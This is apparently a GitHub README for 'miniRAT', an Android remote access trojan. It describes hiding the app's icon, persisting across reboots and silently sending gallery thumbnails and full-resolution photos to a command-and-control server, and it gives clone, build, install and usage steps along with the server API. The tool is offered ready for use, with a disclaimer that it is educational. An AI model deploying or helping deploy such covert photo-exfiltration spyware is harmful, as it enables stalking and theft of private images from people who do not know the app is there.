🐀 miniRAT

A minimal, educational Android Remote Access Trojan

Stealth gallery exfiltration • Full image on-demand • Auto-hide from launcher

---

miniRAT silently scans a target device's gallery, exfiltrates thumbnails to a C2 server, and lets you request full-resolution images on demand — all while invisible to the user.

⚠️ Server Security Notice

Caution

The C2 server is NOT production-ready. It is intended for local testing and development only.

• No authentication or access control
• No HTTPS/TLS (plaintext HTTP)
• No rate limiting or input validation
• No device identity verification
• Potential path traversal vectors

Do NOT expose this server to the public internet. Use it only in controlled, local network environments.

---

⚡ How It Works

📱 Target Device                          🖥️ C2 Server (dashboard)
                                          
 App installed → icon vanishes →           node server.js (:5000)
 foreground service starts →               
                                          
 ┌──────── Every 30 sec ────────┐         ┌──────────────────────┐
 │                              │         │                      │
 │  1. HEAD → server up?        │────────▶│  ✓ 200 OK           │
 │     no → idle, retry later   │         │                      │
 │                              │         │                      │
 │  2. Scan gallery             │         │                      │
 │     skip already-uploaded    │         │                      │
 │                              │         │                      │
 │  3. POST thumbnails          │────────▶│  Save to ./uploads   │
 │     (128×128, ~10 KB each)   │         │                      │
 │                              │         │                      │
 │  4. GET /api/requests        │────────▶│  Any full-image      │
 │     any full-image requests? │         │  requests queued?    │
 │                              │         │                      │
 │  5. POST full images         │────────▶│  Save to ./full_res  │
 │     (parallel thread)        │         │                      │
 └──────────────────────────────┘         └──────────────────────┘

---

🔥 Features

📱 Android Client Headless mode — Switches to background-only after first launch Periodic scan — Every 30 sec, checks for new photos Server-aware — Only uploads when C2 is reachable Deduplication — Never re-uploads the same image Fast Full-Res — Dedicated 5s polling for instant high-res uploads Full image on-demand — Server requests → phone uploads full-res All image formats — JPEG, PNG, WEBP, GIF, HEIC, BMP... Memory-safe — Downsampled decoding + bitmap recycling WakeLock — CPU active during scan even with screen off Boot persistence — BootReceiver + START_STICKY Modular code — Clean separation of concerns

🖥️ C2 Server Live dashboard — Dark-themed, 3s auto-refresh Request queue — Click thumbnail → request full image Download button — Appears when full image arrives Pending indicator — Shows which requests are in-flight File-based persistence — Thumbnails + metadata on disk 50MB JSON limit — Handles full-res uploads Path traversal protection — path.basename() sanitization

---

🚀 Quick Start

1. Configure

git clone https://github.com/Rhishavhere/miniRAT.git
cd miniRAT
echo "SERVER_URL=https://your-server.com" > app/local.properties

2. Start C2

1. Install dependencies:

   npm install express cors multer dotenv express-session

2. Configure Authentication: Create a .env file in the root directory:

   ADMIN_USERNAME=your_username
   ADMIN_PASSWORD=your_password

3. Run Server:

   node server.js

3. Build & Deploy

./gradlew assembleDebug
adb install app/build/outputs/apk/debug/app-debug.apk

4. Usage

1. Tap app icon once → grant permission → icon vanishes
2. Thumbnails start appearing on dashboard
3. Hover any thumbnail → click "📥 Request Full"
4. Wait for next scan cycle → "⬇ Download" button appears

---

📁 Project Structure

miniRAT/
│
├── 📱 app/src/main/java/com/app/minirat/
│   ├── HeadlessMode.java         # Entry: permission → service → headless
│   ├── Service.java              # Lifecycle + scan scheduling
│   ├── GalleryScanner.java       # MediaStore queries + image processing
│   ├── NetworkManager.java       # HTTP: ping, upload, request queue
│   ├── UploadTracker.java        # SharedPreferences deduplication
│   ├── MediaItem.java            # Data class (id, uri, name)
│   └── BootReceiver.java         # Auto-restart on reboot
│
├── 🖥️ server.js                   # C2 server + live dashboard
│
└── 📁 uploads/
    ├── *_thumb.jpg                # Thumbnails
    ├── *.metadata.json            # Upload metadata
    ├── requests.json              # Pending request queue
    └── fullsize/                  # Full-resolution images

---

🌐 API Reference

Method	Endpoint	Description
HEAD	/api/thumbnails	Reachability check
POST	/api/upload/thumbnail	Upload { filename, thumbnail }
POST	/api/upload/fullsize	Upload { filename, image }
GET	/api/thumbnails	List all (with fullsize/pending status)
GET	/api/fullsize/:file	Download full-size image
GET	/api/requests	List pending requests
POST	/api/request/:file	Queue a full-image request
DELETE	/api/request/:file	Mark request as fulfilled
GET	/	Live gallery dashboard

---

⚠️ Disclaimer

Educational and authorized security research only. Only install on devices you own or have explicit written authorization to test. Unauthorized use against devices you do not own is illegal and may violate computer fraud laws.

---

Built for learning. Use responsibly.